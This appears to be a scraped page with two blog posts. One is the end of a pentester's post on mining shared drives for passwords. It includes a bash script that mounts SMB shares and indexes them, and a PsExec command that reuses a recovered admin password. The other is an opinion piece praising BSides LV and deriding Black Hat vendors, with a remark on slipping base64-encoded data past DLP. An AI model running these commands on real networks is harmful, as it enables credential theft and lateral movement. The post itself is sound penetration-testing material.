The keyword list is by no means comprehensive, but it should provide a solid foundation for thinking about the sensitive documents that get shared with everyone. As pentesters, we can use this information to increase our reach and impact on the client network. Knowing things like the local administrator passwords and using them with PsExec can compromise the majority of machines on the network, and the chances of then finding a domain administrator token on one of those boxes go up accordingly (a sketch of this follows at the end of the post). Even the best training and policies are not going to stop certain system administrators from reusing passwords, so recovering some of these passwords can usually yield some interesting findings. Another high-risk finding is database credentials, which almost never get changed and often allow system commands to be executed.

Knowing how to find sensitive information is a great skill to have in your arsenal, and I hope this short post inspires you to become a better tester. The days of vulnerability scanners getting you root or SYSTEM are numbered, and exploiting human weaknesses is becoming a necessity on modern networks.
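For reference, here is a rough sketch of the mount-and-index setup described above. Every specific value in it (share paths, credentials, config numbers, file types) is made up for illustration; substitute the shares ShareEnum actually gave you and tune to taste.

#!/bin/bash
# shares.txt holds one UNC path per line in //server/share form,
# e.g. //FILESRV01/Finance (hostname and credentials are hypothetical).
while read -r share; do
    point="/mnt/$(echo "$share" | sed 's|^//||; s|/|_|g')"
    mkdir -p "$point"
    mount -t cifs "$share" "$point" -o ro,username=victimuser,password='Password1'
done < shares.txt

# Illustrative ~/.recoll/recoll.conf values to match the settings above:
cat >> ~/.recoll/recoll.conf <<'EOF'
topdirs = /mnt
idxflushmb = 256
skippedNames = *.exe *.dll *.iso *.bin
indexedmimetypes = text/plain text/html application/pdf application/msword
EOF

And the password-reuse point, sketched with Sysinternals PsExec (the hostname and password are again hypothetical):

psexec.exe \\TARGETHOST -u Administrator -p RecoveredPass1 cmd.exe

Credits to: norsec0de

Source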
-
Through a series of strange decisions I found myself on the way to Las Vegas during the same week as Black Hat, but without a ticket to the Black Hat Briefings. This didn't faze me in the slightest, as I attended Black Hat last year and, to be quite frank, I wasn't impressed. It did raise an interesting question though: if I'm not wasting my time at Black Hat, what could I be doing? The question was easily answered, as just about every person I look up to in the InfoSec industry was heading to one place: BSides LV at the Tuscany Hotel.

I'd never attended a BSides conference before and had no idea what to expect. How much are the tickets? How long are the queues for the talks? How much are the food and drinks? It turns out the answer to all of the above is pretty much nothing. What I want to take away from an InfoSec conference is to have learned something, met some interesting people, helped other people who had questions and generally had a good time doing it. Walking into BSides on Tuesday morning, I was warmly greeted and given a badge and a smile. That's it. No spammy email address, no dollars, just a badge.

Walking around BSides I saw an abundance of tracks, workshops and a large chill-out area with free drinks (as in beer), raffles and competitions. I spent the large majority of the con on the red team for the "Joes vs Pros CTF" competition, which gives defensive security and network engineers a chance to feel the heat of a red team bashing the hell out of their network. Uptime is important for points, and a gold team keeps sending the blue teams help-desk requests, which need to be actioned while they frantically try to secure their network and kill our shells.

After the competition closed on Tuesday, I had a chat with the winning blue team, who did a really good job of locking us out whilst maintaining uptime on critical services. These guys got pummelled last year and came away with new skills and ideas that they implemented this year. A few of the members said they had learned more from competing in Joes vs Pros for a single day than from years of college and certifications. They mentioned that dealing with an active attack, while being forced to keep vulnerable software up and running, taught them to look further than simple patching exercises. The creativity they came up with was astounding: from setting up spoofed sites with no back-end connected to them, to serving us honeypots and ban-hammering us on their firewalls.

The following day, the blues got their own red team members and had to engage the opposing blue team. With a red team member assisting with the exploitation of the target machines compromised the day before, the blues got to experience the attack from the red team's point of view and learned how targets are enumerated, as well as which weaknesses in the discovered applications get exploited. That information was then used to harden their own applications, making exploitation by the opposing team much more difficult or even impossible.

What I took away from this experience is that these blue team members are getting valuable training, whilst having a good time, essentially for the price of getting to Las Vegas. BSides volunteers make the con what it is, and sponsor donations go towards the cost of setting up the competitions and providing prizes and drinks. I learned a lot about BSides over my two days there.
I attended some good talks, snuck into a workshop where attendees were taught to build an RFID reader that works from 4 feet away with only $35 of hardware, met some awesome people and had a great time doing it all.

All this made me really REALLY angry. Even though there was good work being done and great knowledge being shared at the Tuscany Hotel, several blocks away the world's largest "security" conference was being held, doing a fine job of advancing just about everything that is wrong with this industry. Since starting work as a penetration tester, I've noticed one very big problem within the information security realm. By far the biggest problem that currently exists in InfoSec is that people still believe they can "buy" security. Right out of the gate I will tell you: this is bullshit! You cannot buy anything from any vendor that will stop your company getting compromised. Buzzwords like Next-Gen, Multi-Tiered, Smart and APT are just marketing turd-speak for devices that basically do nothing. And Black Hat is the single biggest culprit in promoting the use of these "magic bullets."

After you've cleared away all the fluff around Black Hat, what you're left with is a room full of "magic bullets" being shown off by booth babes and a bunch of "researchers" giving presentations to massive audiences about why people should buy them. To make matters worse, the amount of money spent on these devices each year is astronomical, yet more and more companies are getting compromised every day, now more than ever before.

I borrowed a ticket to visit the vendor-fest on Thursday for a couple of hours to see what, if anything, was better about this year than last. After all, 8000 people can't be wrong, right? After looking at the briefings and seeing that there was hardly anything of value worth watching, I wandered over to the vendor area. I ended up speaking to a golf shirt about his "magical DLP machine", which uses sophisticated algorithms and cutting-edge buzzwords to hunt down people leaking trade secrets and PII. I asked him if the machine would catch someone exfiltrating credit card numbers and the response was a resounding "Oh definitely!" When asked what the machine would do if someone base64'd that same information first, he ran off to find someone with a brain. I then spoke to one of the "magical DLP machine" developers, who told me that the CPU cycles needed to decode the traffic would be too much at such high throughput, so base64 traffic would not be decoded before the contents were checked.

Then I saw the big one: a box that can detect 0-day malware. Oh wow. Problem solved. These guys have cracked the code. They have made a device smarter than all the malware devs of Russia, Ukraine and Belize combined. Or have they? I challenge you: deploy that thing on a public network and offer $1 million to the first person who deploys malware on the same network that the magical box cannot detect.

Vendor after vendor pitched me their next-gen, cutting-edge, complex-algorithm, layer-7 flashy box, and each and every time I could outwit their machines in under 5 minutes. Again, if you didn't read it earlier: "YOU CAN'T BUY SECURITY!" Walking into Black Hat and throwing money at everything with a flashing light and a web console is not going to make you or your company more secure.
Even if you bought each and every single device and had them professionally installed with maximum protections enabled, any pentester worth their salt could still compromise your network with a smile or a cleverly worded email. And that is the main reason why all these products do not work. Chris Nickerson put it best: "You say your device can do this? Prove it! You say your company is secure? Prove it! You say the bad guys can't get your customer data? Prove it!"

If for one second you actually believe the hype regurgitated by these pretty boys with their sunglasses and golf shirts, marketing some box that protects against everything, then you have already lost. If it could genuinely solve all your information security problems as soon as you plugged it in, they could sell it for a bazillion dollars and you would gladly buy it. But the reality is that you're actually buying nothing. You're buying a marketing pitch. Maybe you're buying a few nights of peaceful sleep. Maybe you're buying a bigger budget next year. Maybe you're buying an alliance with some vendor. But you are not buying security, and the vendors cannot prove that their solutions do anything to stop a determined attacker. All they can do is show you that, in a perfect simulated test environment, the box does something. Would it work in your environment? Maybe. Will it make you more secure? Probably not. Does the machine do all the things it says on the tin? Doubtful.

I'm not saying that there is no value in Black Hat. I'm saying there is no value in purchasing a $1500 ticket to attend a convention where you are encouraged to purchase more things. If you are in the security industry and attend Black Hat to network with clients, great; you could probably do that for free at one of the million parties held after hours. Just avoid all the golf-shirted booth-boys running around with their sunglasses on at night calling themselves hackers because they work for a company whose product can detect SQLi vulnerabilities. "Shut up, you're a sales monkey!"

There are also some good talks at the briefings; Black Hat is not without interesting material. But from an attacker's point of view, I find its content weak and lacking compared to BSides. If you are the principal or manager of a pentest team, please don't send your testers to Black Hat; let them attend BSides instead, where they can actually learn, meet, teach and have fun.

P.S. All of the above is my opinion, which I'm entitled to. However, if you managed to read this far and wish to bitch at me for saying what I did, use the comment feature below and I'll make every effort to respond if required.

Source